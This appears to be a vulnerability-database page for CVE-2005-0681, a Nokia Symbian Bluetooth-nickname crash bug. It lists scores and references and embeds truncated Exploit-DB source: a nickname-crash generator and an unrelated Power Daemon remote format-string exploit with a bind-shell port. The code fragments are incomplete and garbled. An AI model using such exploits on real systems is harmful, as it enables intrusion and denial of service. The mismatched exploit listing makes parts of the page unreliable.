CVE-2005-0681
published 2005-03-06CVE-2005-0681: Nokia Symbian 60 allows remote attackers to cause a denial of service (phone restart) via a Bluetooth nickname.
PriorityP417medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.11%
86.2th percentile
Nokia Symbian 60 allows remote attackers to cause a denial of service (phone restart) via a Bluetooth nickname.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nokia | series | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Power Daemon 2.0.2 - 'WHATIDO' Remote Format String
exploitdb·2006-02-10
CVE-2006-0681 Power Daemon 2.0.2 - 'WHATIDO' Remote Format String
Power Daemon 2.0.2 - 'WHATIDO' Remote Format String
---
/*
* gexp-powerd.c
*
* Power Daemon v2.0.2 Remote Format String Exploit
* Copyright (C) 2005 Gotfault Security
*
* Bug found and developed by: barros and xgc
*
* Original Reference:
* http://gotfault.net/research/exploit/gexp-powerd.c
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*==[ Prototypes ]==*/
void fatal(char *);
void Usage(char *);
void FakeServer(char *,int);
void ExecuteShell(int);
int CreateEvilBuffer(int,int,int,int,char *);
int ConnectToShell(char *,int);
/*==[ Defines ]==*/
#define DEFAULT_PORT 532 // Default fake server port
#define BIND_PORT 31337 // Default port to bind
#define NOPSIZE 50 // Number of NOP
#define NOP 0x90 // NOP byte
#define PAD "" // Fo
Exploit-DB
Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)
exploitdb·2005-09-23
CVE-2005-0681 Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)
Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)
---
/*
Nokia Bluetab Exploit
Found & coded by Qnix
- This Exploit will creat file called bluetab.txt with your
bluetooth nickname, send the file to your nokia mobile
open it copy the nickname and paste it to your bluetooth
nickname, if any one search and find your nickname his
mobile will restart .
- this exploit work on many other symbian and java mobiles .
Qnix - [email protected]
*/
#include
#define tab1 0x09
#define tab2 0x2E
#define dot1 0x0A
int main(int argc,char *argv[])
{
FILE *bluetab;
if(argc \n");
return 0;
}
else
{
msgm();
printf("bluetab.txt file created with your nickname . \n");
}
bluetab = fopen("bluetab.txt","w");
if(!bluetab)
{
msgm();
printf("Some kind of file error!\n");
return 0;
}
fprintf(bluetab,"
No writeups or analysis indexed.
http://securitytracker.com/id?1013380http://www.osvdb.org/14574http://www.securiteam.com/securitynews/5PP0V00G1S.htmlhttp://www.securityfocus.com/bid/12743https://exchange.xforce.ibmcloud.com/vulnerabilities/19594http://securitytracker.com/id?1013380http://www.osvdb.org/14574http://www.securiteam.com/securitynews/5PP0V00G1S.htmlhttp://www.securityfocus.com/bid/12743https://exchange.xforce.ibmcloud.com/vulnerabilities/19594
2005-03-06
Published